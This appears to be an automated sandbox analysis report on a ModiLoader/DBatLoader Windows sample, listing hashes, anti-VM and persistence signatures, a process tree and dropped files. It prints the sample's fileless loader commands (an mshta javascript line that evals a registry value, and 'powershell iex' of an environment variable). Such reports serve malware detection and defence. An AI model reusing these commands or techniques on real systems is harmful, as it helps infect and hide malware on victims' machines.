Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags
    arch:x64 arch:x86 image:win7-20231129-en locale:en-us os:windows7-x64 system
  • submitted
    07-05-2024 05:27

General

  • Target

    1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe

  • Size

    356KB

  • MD5

    1f98f4990bbf6b268365ba7fdf56405f

  • SHA1

    e1f5a46baf14c6fdd67fcb1b3d37b54ad9a52317

  • SHA256

    5f2ebf4e711218b1c47e8c83cbe354a369efcfed3835c480c7ae08001dfbdb8f

  • SHA512

    bbf91e6a1a1c2a50f630d4ec347c7678647a78ce976af3db92b62498f77af84f506e1dadd4d9d8757c9f2297e80bbaf96e8575f5cb331800465417a6ed08717f

  • SSDEEP

    6144:Sae/c0RVIqxFu4s2a9XHCd9hxJamsAT4k+wCGbfQfojzMBR5h:W/cMVDxFu43cHYf1TPCAxjzMj

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
  • ModiLoader Second Stage 64 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 3 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Looks for VMWare Tools registry key
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:2340
    • C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Looks for VMWare Tools registry key
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of UnmapMainImage
      PID:2308
  • C:\Windows\system32\mshta.exe
    "C:\Windows\system32\mshta.exe" javascript:wh5VXfF0="RGcF6bBbn8";J3G3=new%20ActiveXObject("WScript.Shell");SsG4Jhybu="zl6rcltazH";Lcu0I=J3G3.RegRead("HKLM\\software\\Wow6432Node\\QpgStiGQ4\\NzOMWkbXt");Lqt0swCDV="XirWa1";eval(Lcu0I);cRNm3TX="ny";
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:2540
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:amuexm
      2⤵
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2812
      • C:\Windows\SysWOW64\regsvr32.exe
        regsvr32.exe
        3⤵
        • Looks for VirtualBox Guest Additions in registry
        • Looks for VirtualBox drivers on disk
        • Looks for VMWare Tools registry key
        • Checks BIOS information in registry
        • Deletes itself
        • Drops startup file
        • Adds Run key to start application
        • Maps connected drives based on registry
        • Suspicious use of SetThreadContext
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:2140
        • C:\Windows\SysWOW64\regsvr32.exe
          "C:\Windows\SysWOW64\regsvr32.exe"
          4⤵
            PID:2876

Network

MITRE ATT&CK Enterprise v15

Downloads

    • C:\Users\Admin\AppData\Local\416844\1a6bc1.983f33d

      Filesize

      10KB

      MD5

      1e74f54983f584fb375997f6d710fcc5

      SHA1

      e29d7ef56bd7b0d365e4154e7fa13a56dbdb8d9f

      SHA256

      163a3152a25643419866d8d77145766341a0c8aab5f041f28b8d30b87610b1be

      SHA512

      79434d6e22b91427bf4846efcd6a88a1752a28c577dd65b28ba761d82fdba6567ce42458bba5563ccb8041e766e35a4021e5200a6647ddc9d38f4102e8978164

    • C:\Users\Admin\AppData\Local\416844\7efaba.bat

      Filesize

      61B

      MD5

      a9d3ea542d72c3d4eb6e79b37f9b265e

      SHA1

      9ef048c6a4cc72891fe4b6d8c3ae59e134711cb9

      SHA256

      d287a2bcc9c2485a60329a6bb94fb260bec57524e3098a5bd7c7cedf3e460314

      SHA512

      eba879b158972749be9a48b1ff0d7393f69960da48c1f8e92c3886d9cf16ae437ac5eea449f59de788cbf5b9033ebc78311f2b591f6d41631521a3f0ea24208b

    • C:\Users\Admin\AppData\Local\416844\eecdc5.lnk

      Filesize

      881B

      MD5

      fda8ceca25b52950b08c0f043937cecb

      SHA1

      5cf5d7016ab5b938ded88c6ca5e2a23fe34f6820

      SHA256

      9eab49ea41f5fe232064099743a5d1b73c172f14eb2941b1d740f55b547c7822

      SHA512

      df7b8749d776077a24a6d9b5517b071b6497bc0232027bec799efe2ea6428203a299dd8cdd56f34498400423633f82ad73d5c4431b6777aa04dc5ab2e8fa1653

    • C:\Users\Admin\AppData\Roaming\730a4b\791dbf.983f33d

      Filesize

      2KB

      MD5

      14d6113f0996400fbfc9e43e66608164

      SHA1

      1e9f4c8b164b04254a56374506c6615f78ef879b

      SHA256

      dbfdb41e2c34703b6d471705ecd3a00d9b21b3e4777babf0b0077e6f26885099

      SHA512

      a507ee36325ac7ba7021230f1536dd8f5569f1da3f8549d5c245e862fb45fd800946a7b0793ed48bed0b082a1db8e058b074bc020273879d8982b09a28bd3da6

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\be0980.lnk

      Filesize

      991B

      MD5

      d5bcec5b230d761d784e7aac99b76091

      SHA1

      a8f306eb2135a2a7ea3b52a86f0f4a0d6ac74d00

      SHA256

      41de7af6eb3efa1d53733bf5717bc833ab6033d0e49ec207c7a67531bbb28053

      SHA512

      ac8463090bd2dea9627bd12ff335c5380a4e247a0bd70fb71fcad4cf0c001f14cf97aebd405d017fe3e4d5e41f0ca4ce8a8345f35842241375e0a5f83b55ca39

    • \Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe

      Filesize

      356KB

      MD5

      1f98f4990bbf6b268365ba7fdf56405f

      SHA1

      e1f5a46baf14c6fdd67fcb1b3d37b54ad9a52317

      SHA256

      5f2ebf4e711218b1c47e8c83cbe354a369efcfed3835c480c7ae08001dfbdb8f

      SHA512

      bbf91e6a1a1c2a50f630d4ec347c7678647a78ce976af3db92b62498f77af84f506e1dadd4d9d8757c9f2297e80bbaf96e8575f5cb331800465417a6ed08717f
